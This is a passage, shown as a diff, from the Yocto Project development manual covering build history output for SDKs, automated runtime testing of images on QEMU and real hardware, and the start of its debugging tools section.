+writing only image information without any history by adding the
+following to your ``conf/local.conf`` file found in the
+:term:`Build Directory`:
+::
+
+ INHERIT += "buildhistory"
+ BUILDHISTORY_COMMIT = "0"
+ BUILDHISTORY_FEATURES = "image"
+
+Here, you set the
+:term:`BUILDHISTORY_FEATURES`
+variable to use the image feature only.
+
+Build History SDK Information
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Build history collects similar information on the contents of SDKs (e.g.
+``bitbake -c populate_sdk imagename``) as compared to information it
+collects for images. Furthermore, this information differs depending on
+whether an extensible or standard SDK is being produced.
+
+The following list shows the files produced for SDKs:
+
+- ``files-in-sdk.txt:`` A list of files in the SDK with permissions,
+ owner, group, size, and symlink information. This list includes both
+ the host and target parts of the SDK.
+
+- ``sdk-info.txt:`` A text file containing name-value pairs with
+ information about the SDK. See the following listing example for more
+ information.
+
+- ``sstate-task-sizes.txt:`` A text file containing name-value pairs
+ with information about task group sizes (e.g. ``do_populate_sysroot``
+ tasks have a total size). The ``sstate-task-sizes.txt`` file exists
+ only when an extensible SDK is created.
+
+- ``sstate-package-sizes.txt:`` A text file containing name-value pairs
+ with information for the shared-state packages and sizes in the SDK.
+ The ``sstate-package-sizes.txt`` file exists only when an extensible
+ SDK is created.
+
+- ``sdk-files:`` A folder that contains copies of the files mentioned
+ in ``BUILDHISTORY_SDK_FILES`` if the files are present in the output.
+ Additionally, the default value of ``BUILDHISTORY_SDK_FILES`` is
+ specific to the extensible SDK although you can set it differently if
+ you would like to pull in specific files from the standard SDK.
+
+ The default files are ``conf/local.conf``, ``conf/bblayers.conf``,
+ ``conf/auto.conf``, ``conf/locked-sigs.inc``, and
+ ``conf/devtool.conf``. Thus, for an extensible SDK, these files get
+ copied into the ``sdk-files`` directory.
+
+- The following information appears under each of the ``host`` and
+ ``target`` directories for the portions of the SDK that run on the
+ host and on the target, respectively:
+
+ .. note::
+
+ The following files for the most part are empty when producing an
+ extensible SDK because this type of SDK is not constructed from
+ packages as is the standard SDK.
+
+ - ``depends.dot:`` Dependency graph for the SDK that is compatible
+ with ``graphviz``.
+
+ - ``installed-package-names.txt:`` A list of installed packages by
+ name only.
+
+ - ``installed-package-sizes.txt:`` A list of installed packages
+ ordered by size.
+
+ - ``installed-packages.txt:`` A list of installed packages with full
+ package filenames.
+
+Here is an example of ``sdk-info.txt``:
+
+.. code-block:: none
+
+ DISTRO = poky
+ DISTRO_VERSION = 1.3+snapshot-20130327
+ SDK_NAME = poky-glibc-i686-arm
+ SDK_VERSION = 1.3+snapshot
+ SDKMACHINE =
+ SDKIMAGE_FEATURES = dev-pkgs dbg-pkgs
+ BAD_RECOMMENDATIONS =
+ SDKSIZE = 352712
+
+Other than ``SDKSIZE``, which is
+the total size of the files in the SDK in Kbytes, the name-value pairs
+are variables that might have influenced the content of the SDK. This
+information is often useful when you are trying to determine why a
+change in the package or file listings has occurred.
+
+Examining Build History Information
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+You can examine build history output from the command line or from a web
+interface.
+
+To see any changes that have occurred (assuming you have
+:term:`BUILDHISTORY_COMMIT` = "1"),
+you can simply use any Git command that allows you to view the history
+of a repository. Here is one method:
+::
+
+ $ git log -p
+
+You need to realize,
+however, that this method does show changes that are not significant
+(e.g. a package's size changing by a few bytes).
+
+A command-line tool called ``buildhistory-diff`` does exist, though,
+that queries the Git repository and prints just the differences that
+might be significant in human-readable form. Here is an example:
+::
+
+ $ ~/poky/poky/scripts/buildhistory-diff . HEAD^
+ Changes to images/qemux86_64/glibc/core-image-minimal (files-in-image.txt):
+ /etc/anotherpkg.conf was added
+ /sbin/anotherpkg was added
+ * (installed-package-names.txt):
+ * anotherpkg was added
+ Changes to images/qemux86_64/glibc/core-image-minimal (installed-package-names.txt):
+ anotherpkg was added
+ packages/qemux86_64-poky-linux/v86d: PACKAGES: added "v86d-extras"
+ * PR changed from "r0" to "r1"
+ * PV changed from "0.1.10" to "0.1.12"
+ packages/qemux86_64-poky-linux/v86d/v86d: PKGSIZE changed from 110579 to 144381 (+30%)
+ * PR changed from "r0" to "r1"
+ * PV changed from "0.1.10" to "0.1.12"
+
+.. note::
+
+ The ``buildhistory-diff`` tool requires the ``GitPython``
+ package. Be sure to install it using Pip3 as follows:
+ ::
+
+ $ pip3 install GitPython --user
+
+
+ Alternatively, you can install ``python3-git`` using the appropriate
+ distribution package manager (e.g. ``apt-get``, ``dnf``, or ``zipper``).
+
+To see changes to the build history using a web interface, follow the
+instruction in the ``README`` file
+:yocto_git:`here </cgit/cgit.cgi/buildhistory-web/>`.
+
+Here is a sample screenshot of the interface:
+
+.. image:: figures/buildhistory-web.png
+ :align: center
+
+Performing Automated Runtime Testing
+====================================
+
+The OpenEmbedded build system makes available a series of automated
+tests for images to verify runtime functionality. You can run these
+tests on either QEMU or actual target hardware. Tests are written in
+Python making use of the ``unittest`` module, and the majority of them
+run commands on the target system over SSH. This section describes how
+you set up the environment to use these tests, run available tests, and
+write and add your own tests.
+
+For information on the test and QA infrastructure available within the
+Yocto Project, see the ":ref:`ref-manual/ref-release-process:testing and quality assurance`"
+section in the Yocto Project Reference Manual.
+
+Enabling Tests
+--------------
+
+Depending on whether you are planning to run tests using QEMU or on the
+hardware, you have to take different steps to enable the tests. See the
+following subsections for information on how to enable both types of
+tests.
+
+.. _qemu-image-enabling-tests:
+
+Enabling Runtime Tests on QEMU
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+In order to run tests, you need to do the following:
+
+- *Set up to avoid interaction with sudo for networking:* To
+ accomplish this, you must do one of the following:
+
+ - Add ``NOPASSWD`` for your user in ``/etc/sudoers`` either for all
+ commands or just for ``runqemu-ifup``. You must provide the full
+ path as that can change if you are using multiple clones of the
+ source repository.
+
+ .. note::
+
+ On some distributions, you also need to comment out "Defaults
+ requiretty" in ``/etc/sudoers``.
+
+ - Manually configure a tap interface for your system.
+
+ - Run as root the script in ``scripts/runqemu-gen-tapdevs``, which
+ should generate a list of tap devices. This is the option
+ typically chosen for Autobuilder-type environments.
+
+ .. note::
+
+ - Be sure to use an absolute path when calling this script
+ with sudo.
+
+ - Ensure that your host has the package ``iptables`` installed.
+
+ - The package recipe ``qemu-helper-native`` is required to run
+ this script. Build the package using the following command:
+ ::
+
+ $ bitbake qemu-helper-native
+
+- *Set the DISPLAY variable:* You need to set this variable so that
+ you have an X server available (e.g. start ``vncserver`` for a
+ headless machine).
+
+- *Be sure your host's firewall accepts incoming connections from
+ 192.168.7.0/24:* Some of the tests (in particular DNF tests) start an
+ HTTP server on a random high number port, which is used to serve
+ files to the target. The DNF module serves
+ ``${WORKDIR}/oe-rootfs-repo`` so it can run DNF channel commands.
+ That means your host's firewall must accept incoming connections from
+ 192.168.7.0/24, which is the default IP range used for tap devices by
+ ``runqemu``.
+
+- *Be sure your host has the correct packages installed:* Depending
+ your host's distribution, you need to have the following packages
+ installed:
+
+ - Ubuntu and Debian: ``sysstat`` and ``iproute2``
+
+ - OpenSUSE: ``sysstat`` and ``iproute2``
+
+ - Fedora: ``sysstat`` and ``iproute``
+
+ - CentOS: ``sysstat`` and ``iproute``
+
+Once you start running the tests, the following happens:
+
+1. A copy of the root filesystem is written to ``${WORKDIR}/testimage``.
+
+2. The image is booted under QEMU using the standard ``runqemu`` script.
+
+3. A default timeout of 500 seconds occurs to allow for the boot process
+ to reach the login prompt. You can change the timeout period by
+ setting
+ :term:`TEST_QEMUBOOT_TIMEOUT`
+ in the ``local.conf`` file.
+
+4. Once the boot process is reached and the login prompt appears, the
+ tests run. The full boot log is written to
+ ``${WORKDIR}/testimage/qemu_boot_log``.
+
+5. Each test module loads in the order found in ``TEST_SUITES``. You can
+ find the full output of the commands run over SSH in
+ ``${WORKDIR}/testimgage/ssh_target_log``.
+
+6. If no failures occur, the task running the tests ends successfully.
+ You can find the output from the ``unittest`` in the task log at
+ ``${WORKDIR}/temp/log.do_testimage``.
+
+.. _hardware-image-enabling-tests:
+
+Enabling Runtime Tests on Hardware
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The OpenEmbedded build system can run tests on real hardware, and for
+certain devices it can also deploy the image to be tested onto the
+device beforehand.
+
+For automated deployment, a "master image" is installed onto the
+hardware once as part of setup. Then, each time tests are to be run, the
+following occurs:
+
+1. The master image is booted into and used to write the image to be
+ tested to a second partition.
+
+2. The device is then rebooted using an external script that you need to
+ provide.
+
+3. The device boots into the image to be tested.
+
+When running tests (independent of whether the image has been deployed
+automatically or not), the device is expected to be connected to a
+network on a pre-determined IP address. You can either use static IP
+addresses written into the image, or set the image to use DHCP and have
+your DHCP server on the test network assign a known IP address based on
+the MAC address of the device.
+
+In order to run tests on hardware, you need to set ``TEST_TARGET`` to an
+appropriate value. For QEMU, you do not have to change anything, the
+default value is "qemu". For running tests on hardware, the following
+options exist:
+
+- *"simpleremote":* Choose "simpleremote" if you are going to run tests
+ on a target system that is already running the image to be tested and
+ is available on the network. You can use "simpleremote" in
+ conjunction with either real hardware or an image running within a
+ separately started QEMU or any other virtual machine manager.
+
+- *"SystemdbootTarget":* Choose "SystemdbootTarget" if your hardware is
+ an EFI-based machine with ``systemd-boot`` as bootloader and
+ ``core-image-testmaster`` (or something similar) is installed. Also,
+ your hardware under test must be in a DHCP-enabled network that gives
+ it the same IP address for each reboot.
+
+ If you choose "SystemdbootTarget", there are additional requirements
+ and considerations. See the "`Selecting
+ SystemdbootTarget <#selecting-systemdboottarget>`__" section, which
+ follows, for more information.
+
+- *"BeagleBoneTarget":* Choose "BeagleBoneTarget" if you are deploying
+ images and running tests on the BeagleBone "Black" or original
+ "White" hardware. For information on how to use these tests, see the
+ comments at the top of the BeagleBoneTarget
+ ``meta-yocto-bsp/lib/oeqa/controllers/beaglebonetarget.py`` file.
+
+- *"EdgeRouterTarget":* Choose "EdgeRouterTarget" if you are deploying
+ images and running tests on the Ubiquiti Networks EdgeRouter Lite.
+ For information on how to use these tests, see the comments at the
+ top of the EdgeRouterTarget
+ ``meta-yocto-bsp/lib/oeqa/controllers/edgeroutertarget.py`` file.
+
+- *"GrubTarget":* Choose "GrubTarget" if you are deploying images and running
+ tests on any generic PC that boots using GRUB. For information on how
+ to use these tests, see the comments at the top of the GrubTarget
+ ``meta-yocto-bsp/lib/oeqa/controllers/grubtarget.py`` file.
+
+- *"your-target":* Create your own custom target if you want to run
+ tests when you are deploying images and running tests on a custom
+ machine within your BSP layer. To do this, you need to add a Python
+ unit that defines the target class under ``lib/oeqa/controllers/``
+ within your layer. You must also provide an empty ``__init__.py``.
+ For examples, see files in ``meta-yocto-bsp/lib/oeqa/controllers/``.
+
+Selecting SystemdbootTarget
+~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you did not set ``TEST_TARGET`` to "SystemdbootTarget", then you do
+not need any information in this section. You can skip down to the
+"`Running Tests <#qemu-image-running-tests>`__" section.
+
+If you did set ``TEST_TARGET`` to "SystemdbootTarget", you also need to
+perform a one-time setup of your master image by doing the following:
+
+1. *Set EFI_PROVIDER:* Be sure that ``EFI_PROVIDER`` is as follows:
+ ::
+
+ EFI_PROVIDER = "systemd-boot"
+
+2. *Build the master image:* Build the ``core-image-testmaster`` image.
+ The ``core-image-testmaster`` recipe is provided as an example for a
+ "master" image and you can customize the image recipe as you would
+ any other recipe.
+
+ Here are the image recipe requirements:
+
+ - Inherits ``core-image`` so that kernel modules are installed.
+
+ - Installs normal linux utilities not busybox ones (e.g. ``bash``,
+ ``coreutils``, ``tar``, ``gzip``, and ``kmod``).
+
+ - Uses a custom Initial RAM Disk (initramfs) image with a custom
+ installer. A normal image that you can install usually creates a
+ single rootfs partition. This image uses another installer that
+ creates a specific partition layout. Not all Board Support
+ Packages (BSPs) can use an installer. For such cases, you need to
+ manually create the following partition layout on the target:
+
+ - First partition mounted under ``/boot``, labeled "boot".
+
+ - The main rootfs partition where this image gets installed,
+ which is mounted under ``/``.
+
+ - Another partition labeled "testrootfs" where test images get
+ deployed.
+
+3. *Install image:* Install the image that you just built on the target
+ system.
+
+The final thing you need to do when setting ``TEST_TARGET`` to
+"SystemdbootTarget" is to set up the test image:
+
+1. *Set up your local.conf file:* Make sure you have the following
+ statements in your ``local.conf`` file:
+ ::
+
+ IMAGE_FSTYPES += "tar.gz"
+ INHERIT += "testimage"
+ TEST_TARGET = "SystemdbootTarget"
+ TEST_TARGET_IP = "192.168.2.3"
+
+2. *Build your test image:* Use BitBake to build the image:
+ ::
+
+ $ bitbake core-image-sato
+
+Power Control
+~~~~~~~~~~~~~
+
+For most hardware targets other than "simpleremote", you can control
+power:
+
+- You can use ``TEST_POWERCONTROL_CMD`` together with
+ ``TEST_POWERCONTROL_EXTRA_ARGS`` as a command that runs on the host
+ and does power cycling. The test code passes one argument to that
+ command: off, on or cycle (off then on). Here is an example that
+ could appear in your ``local.conf`` file:
+ ::
+
+ TEST_POWERCONTROL_CMD = "powercontrol.exp test 10.11.12.1 nuc1"
+
+ In this example, the expect
+ script does the following:
+
+ .. code-block:: shell
+
+ ssh test@10.11.12.1 "pyctl nuc1 arg"
+
+ It then runs a Python script that controls power for a label called
+ ``nuc1``.
+
+ .. note::
+
+ You need to customize ``TEST_POWERCONTROL_CMD`` and
+ ``TEST_POWERCONTROL_EXTRA_ARGS`` for your own setup. The one requirement
+ is that it accepts "on", "off", and "cycle" as the last argument.
+
+- When no command is defined, it connects to the device over SSH and
+ uses the classic reboot command to reboot the device. Classic reboot
+ is fine as long as the machine actually reboots (i.e. the SSH test
+ has not failed). It is useful for scenarios where you have a simple
+ setup, typically with a single board, and where some manual
+ interaction is okay from time to time.
+
+If you have no hardware to automatically perform power control but still
+wish to experiment with automated hardware testing, you can use the
+``dialog-power-control`` script that shows a dialog prompting you to perform
+the required power action. This script requires either KDialog or Zenity
+to be installed. To use this script, set the
+:term:`TEST_POWERCONTROL_CMD`
+variable as follows:
+::
+
+ TEST_POWERCONTROL_CMD = "${COREBASE}/scripts/contrib/dialog-power-control"
+
+Serial Console Connection
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+For test target classes requiring a serial console to interact with the
+bootloader (e.g. BeagleBoneTarget, EdgeRouterTarget, and GrubTarget),
+you need to specify a command to use to connect to the serial console of
+the target machine by using the
+:term:`TEST_SERIALCONTROL_CMD`
+variable and optionally the
+:term:`TEST_SERIALCONTROL_EXTRA_ARGS`
+variable.
+
+These cases could be a serial terminal program if the machine is
+connected to a local serial port, or a ``telnet`` or ``ssh`` command
+connecting to a remote console server. Regardless of the case, the
+command simply needs to connect to the serial console and forward that
+connection to standard input and output as any normal terminal program
+does. For example, to use the picocom terminal program on serial device
+``/dev/ttyUSB0`` at 115200bps, you would set the variable as follows:
+::
+
+ TEST_SERIALCONTROL_CMD = "picocom /dev/ttyUSB0 -b 115200"
+
+For local
+devices where the serial port device disappears when the device reboots,
+an additional "serdevtry" wrapper script is provided. To use this
+wrapper, simply prefix the terminal command with
+``${COREBASE}/scripts/contrib/serdevtry``:
+::
+
+ TEST_SERIALCONTROL_CMD = "${COREBASE}/scripts/contrib/serdevtry picocom -b 115200 /dev/ttyUSB0"
+
+.. _qemu-image-running-tests:
+
+Running Tests
+-------------
+
+You can start the tests automatically or manually:
+
+- *Automatically running tests:* To run the tests automatically after
+ the OpenEmbedded build system successfully creates an image, first
+ set the
+ :term:`TESTIMAGE_AUTO`
+ variable to "1" in your ``local.conf`` file in the
+ :term:`Build Directory`:
+ ::
+
+ TESTIMAGE_AUTO = "1"
+
+ Next, build your image. If the image successfully builds, the
+ tests run:
+ ::
+
+ bitbake core-image-sato
+
+- *Manually running tests:* To manually run the tests, first globally
+ inherit the
+ :ref:`testimage <ref-classes-testimage*>` class
+ by editing your ``local.conf`` file:
+ ::
+
+ INHERIT += "testimage"
+
+ Next, use BitBake to run the tests:
+ ::
+
+ bitbake -c testimage image
+
+All test files reside in ``meta/lib/oeqa/runtime`` in the
+:term:`Source Directory`. A test name maps
+directly to a Python module. Each test module may contain a number of
+individual tests. Tests are usually grouped together by the area tested
+(e.g tests for systemd reside in ``meta/lib/oeqa/runtime/systemd.py``).
+
+You can add tests to any layer provided you place them in the proper
+area and you extend :term:`BBPATH` in
+the ``local.conf`` file as normal. Be sure that tests reside in
+``layer/lib/oeqa/runtime``.
+
+.. note::
+
+ Be sure that module names do not collide with module names used in
+ the default set of test modules in ``meta/lib/oeqa/runtime``.
+
+You can change the set of tests run by appending or overriding
+:term:`TEST_SUITES` variable in
+``local.conf``. Each name in ``TEST_SUITES`` represents a required test
+for the image. Test modules named within ``TEST_SUITES`` cannot be
+skipped even if a test is not suitable for an image (e.g. running the
+RPM tests on an image without ``rpm``). Appending "auto" to
+``TEST_SUITES`` causes the build system to try to run all tests that are
+suitable for the image (i.e. each test module may elect to skip itself).
+
+The order you list tests in ``TEST_SUITES`` is important and influences
+test dependencies. Consequently, tests that depend on other tests should
+be added after the test on which they depend. For example, since the
+``ssh`` test depends on the ``ping`` test, "ssh" needs to come after
+"ping" in the list. The test class provides no re-ordering or dependency
+handling.
+
+.. note::
+
+ Each module can have multiple classes with multiple test methods.
+ And, Python ``unittest`` rules apply.
+
+Here are some things to keep in mind when running tests:
+
+- The default tests for the image are defined as:
+ ::
+
+ DEFAULT_TEST_SUITES_pn-image = "ping ssh df connman syslog xorg scp vnc date rpm dnf dmesg"
+
+- Add your own test to the list of the by using the following:
+ ::
+
+ TEST_SUITES_append = " mytest"
+
+- Run a specific list of tests as follows:
+ ::
+
+ TEST_SUITES = "test1 test2 test3"
+
+ Remember, order is important. Be sure to place a test that is
+ dependent on another test later in the order.
+
+Exporting Tests
+---------------
+
+You can export tests so that they can run independently of the build
+system. Exporting tests is required if you want to be able to hand the
+test execution off to a scheduler. You can only export tests that are
+defined in :term:`TEST_SUITES`.
+
+If your image is already built, make sure the following are set in your
+``local.conf`` file:
+::
+
+ INHERIT += "testexport"
+ TEST_TARGET_IP = "IP-address-for-the-test-target"
+ TEST_SERVER_IP = "IP-address-for-the-test-server"
+
+You can then export the tests with the
+following BitBake command form:
+::
+
+ $ bitbake image -c testexport
+
+Exporting the tests places them in the
+:term:`Build Directory` in
+``tmp/testexport/``\ image, which is controlled by the
+``TEST_EXPORT_DIR`` variable.
+
+You can now run the tests outside of the build environment:
+::
+
+ $ cd tmp/testexport/image
+ $ ./runexported.py testdata.json
+
+Here is a complete example that shows IP addresses and uses the
+``core-image-sato`` image:
+::
+
+ INHERIT += "testexport"
+ TEST_TARGET_IP = "192.168.7.2"
+ TEST_SERVER_IP = "192.168.7.1"
+
+Use BitBake to export the tests:
+::
+
+ $ bitbake core-image-sato -c testexport
+
+Run the tests outside of
+the build environment using the following:
+::
+
+ $ cd tmp/testexport/core-image-sato
+ $ ./runexported.py testdata.json
+
+.. _qemu-image-writing-new-tests:
+
+Writing New Tests
+-----------------
+
+As mentioned previously, all new test files need to be in the proper
+place for the build system to find them. New tests for additional
+functionality outside of the core should be added to the layer that adds
+the functionality, in ``layer/lib/oeqa/runtime`` (as long as
+:term:`BBPATH` is extended in the
+layer's ``layer.conf`` file as normal). Just remember the following:
+
+- Filenames need to map directly to test (module) names.
+
+- Do not use module names that collide with existing core tests.
+
+- Minimally, an empty ``__init__.py`` file must exist in the runtime
+ directory.
+
+To create a new test, start by copying an existing module (e.g.
+``syslog.py`` or ``gcc.py`` are good ones to use). Test modules can use
+code from ``meta/lib/oeqa/utils``, which are helper classes.
+
+.. note::
+
+ Structure shell commands such that you rely on them and they return a
+ single code for success. Be aware that sometimes you will need to
+ parse the output. See the ``df.py`` and ``date.py`` modules for examples.
+
+You will notice that all test classes inherit ``oeRuntimeTest``, which
+is found in ``meta/lib/oetest.py``. This base class offers some helper
+attributes, which are described in the following sections:
+
+.. _qemu-image-writing-tests-class-methods:
+
+Class Methods
+~~~~~~~~~~~~~
+
+Class methods are as follows:
+
+- *hasPackage(pkg):* Returns "True" if ``pkg`` is in the installed
+ package list of the image, which is based on the manifest file that
+ is generated during the ``do_rootfs`` task.
+
+- *hasFeature(feature):* Returns "True" if the feature is in
+ :term:`IMAGE_FEATURES` or
+ :term:`DISTRO_FEATURES`.
+
+.. _qemu-image-writing-tests-class-attributes:
+
+Class Attributes
+~~~~~~~~~~~~~~~~
+
+Class attributes are as follows:
+
+- *pscmd:* Equals "ps -ef" if ``procps`` is installed in the image.
+ Otherwise, ``pscmd`` equals "ps" (busybox).
+
+- *tc:* The called test context, which gives access to the
+ following attributes:
+
+ - *d:* The BitBake datastore, which allows you to use stuff such
+ as ``oeRuntimeTest.tc.d.getVar("VIRTUAL-RUNTIME_init_manager")``.
+
+ - *testslist and testsrequired:* Used internally. The tests
+ do not need these.
+
+ - *filesdir:* The absolute path to
+ ``meta/lib/oeqa/runtime/files``, which contains helper files for
+ tests meant for copying on the target such as small files written
+ in C for compilation.
+
+ - *target:* The target controller object used to deploy and
+ start an image on a particular target (e.g. Qemu, SimpleRemote,
+ and SystemdbootTarget). Tests usually use the following:
+
+ - *ip:* The target's IP address.
+
+ - *server_ip:* The host's IP address, which is usually used
+ by the DNF test suite.
+
+ - *run(cmd, timeout=None):* The single, most used method.
+ This command is a wrapper for: ``ssh root@host "cmd"``. The
+ command returns a tuple: (status, output), which are what their
+ names imply - the return code of "cmd" and whatever output it
+ produces. The optional timeout argument represents the number
+ of seconds the test should wait for "cmd" to return. If the
+ argument is "None", the test uses the default instance's
+ timeout period, which is 300 seconds. If the argument is "0",
+ the test runs until the command returns.
+
+ - *copy_to(localpath, remotepath):*
+ ``scp localpath root@ip:remotepath``.
+
+ - *copy_from(remotepath, localpath):*
+ ``scp root@host:remotepath localpath``.
+
+.. _qemu-image-writing-tests-instance-attributes:
+
+Instance Attributes
+~~~~~~~~~~~~~~~~~~~
+
+A single instance attribute exists, which is ``target``. The ``target``
+instance attribute is identical to the class attribute of the same name,
+which is described in the previous section. This attribute exists as
+both an instance and class attribute so tests can use
+``self.target.run(cmd)`` in instance methods instead of
+``oeRuntimeTest.tc.target.run(cmd)``.
+
+Installing Packages in the DUT Without the Package Manager
+----------------------------------------------------------
+
+When a test requires a package built by BitBake, it is possible to
+install that package. Installing the package does not require a package
+manager be installed in the device under test (DUT). It does, however,
+require an SSH connection and the target must be using the
+``sshcontrol`` class.
+
+.. note::
+
+ This method uses ``scp`` to copy files from the host to the target, which
+ causes permissions and special attributes to be lost.
+
+A JSON file is used to define the packages needed by a test. This file
+must be in the same path as the file used to define the tests.
+Furthermore, the filename must map directly to the test module name with
+a ``.json`` extension.
+
+The JSON file must include an object with the test name as keys of an
+object or an array. This object (or array of objects) uses the following
+data:
+
+- "pkg" - A mandatory string that is the name of the package to be
+ installed.
+
+- "rm" - An optional boolean, which defaults to "false", that specifies
+ to remove the package after the test.
+
+- "extract" - An optional boolean, which defaults to "false", that
+ specifies if the package must be extracted from the package format.
+ When set to "true", the package is not automatically installed into
+ the DUT.
+
+Following is an example JSON file that handles test "foo" installing
+package "bar" and test "foobar" installing packages "foo" and "bar".
+Once the test is complete, the packages are removed from the DUT.
+::
+
+ {
+ "foo": {
+ "pkg": "bar"
+ },
+ "foobar": [
+ {
+ "pkg": "foo",
+ "rm": true
+ },
+ {
+ "pkg": "bar",
+ "rm": true
+ }
+ ]
+ }
+
+.. _usingpoky-debugging-tools-and-techniques:
+
+Debugging Tools and Techniques
+==============================
+
+The exact method for debugging build failures depends on the nature of
+the problem and on the system's area from which the bug originates.
+Standard debugging practices such as comparison against the last known
+working version with examination of the changes and the re-application
+of steps to identify the one causing the problem are valid for the Yocto
+Project just as they are for any other system. Even though it is
+impossible to detail every possible potential failure, this section
+provides some general tips to aid in debugging given a variety of
+situations.
+
+.. note::
+
+ A useful feature for debugging is the error reporting tool.
+ Configuring the Yocto Project to use this tool causes the
+ OpenEmbedded build system to produce error reporting commands as part
+ of the console output. You can enter the commands after the build
+ completes to log error information into a common database, that can
+ help you figure out what might be going wrong. For information on how
+ to enable and use this feature, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:using the error reporting tool`"
+ section.
+
+The following list shows the debugging topics in the remainder of this
+section:
+
+- "`Viewing Logs from Failed
+ Tasks <#dev-debugging-viewing-logs-from-failed-tasks>`__" describes
+ how to find and view logs from tasks that failed during the build
+ process.
+
+- "`Viewing Variable
+ Values <#dev-debugging-viewing-variable-values>`__" describes how to
+ use the BitBake ``-e`` option to examine variable values after a
+ recipe has been parsed.
+
+- ":ref:`dev-manual/dev-manual-common-tasks:viewing package information with \`\`oe-pkgdata-util\`\``"
+ describes how to use the ``oe-pkgdata-util`` utility to query
+ :term:`PKGDATA_DIR` and
+ display package-related information for built packages.
+
+- "`Viewing Dependencies Between Recipes and
+ Tasks <#dev-viewing-dependencies-between-recipes-and-tasks>`__"
+ describes how to use the BitBake ``-g`` option to display recipe
+ dependency information used during the build.
+
+- "`Viewing Task Variable
+ Dependencies <#dev-viewing-task-variable-dependencies>`__" describes
+ how to use the ``bitbake-dumpsig`` command in conjunction with key
+ subdirectories in the
+ :term:`Build Directory` to determine
+ variable dependencies.
+
+- "`Running Specific Tasks <#dev-debugging-taskrunning>`__" describes
+ how to use several BitBake options (e.g. ``-c``, ``-C``, and ``-f``)
+ to run specific tasks in the build chain. It can be useful to run
+ tasks "out-of-order" when trying isolate build issues.
+
+- "`General BitBake Problems <#dev-debugging-bitbake>`__" describes how
+ to use BitBake's ``-D`` debug output option to reveal more about what
+ BitBake is doing during the build.
+
+- "`Building with No Dependencies <#dev-debugging-buildfile>`__"
+ describes how to use the BitBake ``-b`` option to build a recipe
+ while ignoring dependencies.
+
+- "`Recipe Logging Mechanisms <#recipe-logging-mechanisms>`__"
+ describes how to use the many recipe logging functions to produce
+ debugging output and report errors and warnings.
+
+- "`Debugging Parallel Make Races <#debugging-parallel-make-races>`__"
+ describes how to debug situations where the build consists of several
+ parts that are run simultaneously and when the output or result of
+ one part is not ready for use with a different part of the build that
+ depends on that output.
+
+- "`Debugging With the GNU Project Debugger (GDB)
+ Remotely <#platdev-gdb-remotedebug>`__" describes how to use GDB to
+ allow you to examine running programs, which can help you fix
+ problems.
+
+- "`Debugging with the GNU Project Debugger (GDB) on the
+ Target <#debugging-with-the-gnu-project-debugger-gdb-on-the-target>`__"
+ describes how to use GDB directly on target hardware for debugging.
+
+- "`Other Debugging Tips <#dev-other-debugging-others>`__" describes
+ miscellaneous debugging tips that can be useful.
+
+.. _dev-debugging-viewing-logs-from-failed-tasks:
+
+Viewing Logs from Failed Tasks
+------------------------------
+
+You can find the log for a task in the file
+``${``\ :term:`WORKDIR`\ ``}/temp/log.do_``\ `taskname`.
+For example, the log for the
+:ref:`ref-tasks-compile` task of the
+QEMU minimal image for the x86 machine (``qemux86``) might be in
+``tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/temp/log.do_compile``.
+To see the commands :term:`BitBake` ran
+to generate a log, look at the corresponding ``run.do_``\ `taskname` file
+in the same directory.
+
+``log.do_``\ `taskname` and ``run.do_``\ `taskname` are actually symbolic
+links to ``log.do_``\ `taskname`\ ``.``\ `pid` and
+``log.run_``\ `taskname`\ ``.``\ `pid`, where `pid` is the PID the task had
+when it ran. The symlinks always point to the files corresponding to the
+most recent run.
+
+.. _dev-debugging-viewing-variable-values:
+
+Viewing Variable Values
+-----------------------
+
+Sometimes you need to know the value of a variable as a result of
+BitBake's parsing step. This could be because some unexpected behavior
+occurred in your project. Perhaps an attempt to :ref:`modify a variable
+<bitbake:bitbake-user-manual/bitbake-user-manual-metadata:modifying existing
+variables>` did not work out as expected.
+
+BitBake's ``-e`` option is used to display variable values after
+parsing. The following command displays the variable values after the
+configuration files (i.e. ``local.conf``, ``bblayers.conf``,
+``bitbake.conf`` and so forth) have been parsed:
+::
+
+ $ bitbake -e
+
+The following command displays variable values after a specific recipe has
+been parsed. The variables include those from the configuration as well:
+::
+
+ $ bitbake -e recipename
+
+.. note::
+
+ Each recipe has its own private set of variables (datastore).
+ Internally, after parsing the configuration, a copy of the resulting
+ datastore is made prior to parsing each recipe. This copying implies
+ that variables set in one recipe will not be visible to other
+ recipes.
+
+ Likewise, each task within a recipe gets a private datastore based on
+ the recipe datastore, which means that variables set within one task
+ will not be visible to other tasks.
+
+In the output of ``bitbake -e``, each variable is preceded by a
+description of how the variable got its value, including temporary
+values that were later overridden. This description also includes
+variable flags (varflags) set on the variable. The output can be very
+helpful during debugging.
+
+Variables that are exported to the environment are preceded by
+``export`` in the output of ``bitbake -e``. See the following example:
+::
+
+ export CC="i586-poky-linux-gcc -m32 -march=i586 --sysroot=/home/ulf/poky/build/tmp/sysroots/qemux86"
+
+In addition to variable values, the output of the ``bitbake -e`` and
+``bitbake -e`` recipe commands includes the following information:
+
+- The output starts with a tree listing all configuration files and
+ classes included globally, recursively listing the files they include
+ or inherit in turn. Much of the behavior of the OpenEmbedded build
+ system (including the behavior of the :ref:`ref-manual/ref-tasks:normal recipe build tasks`) is
+ implemented in the
+ :ref:`base <ref-classes-base>` class and the
+ classes it inherits, rather than being built into BitBake itself.
+
+- After the variable values, all functions appear in the output. For
+ shell functions, variables referenced within the function body are
+ expanded. If a function has been modified using overrides or using
+ override-style operators like ``_append`` and ``_prepend``, then the
+ final assembled function body appears in the output.
+
+Viewing Package Information with ``oe-pkgdata-util``
+----------------------------------------------------
+
+You can use the ``oe-pkgdata-util`` command-line utility to query
+:term:`PKGDATA_DIR` and display
+various package-related information. When you use the utility, you must
+use it to view information on packages that have already been built.
+
+Following are a few of the available ``oe-pkgdata-util`` subcommands.
+
+.. note::
+
+ You can use the standard \* and ? globbing wildcards as part of
+ package names and paths.
+
+- ``oe-pkgdata-util list-pkgs [pattern]``: Lists all packages
+ that have been built, optionally limiting the match to packages that
+ match pattern.
+
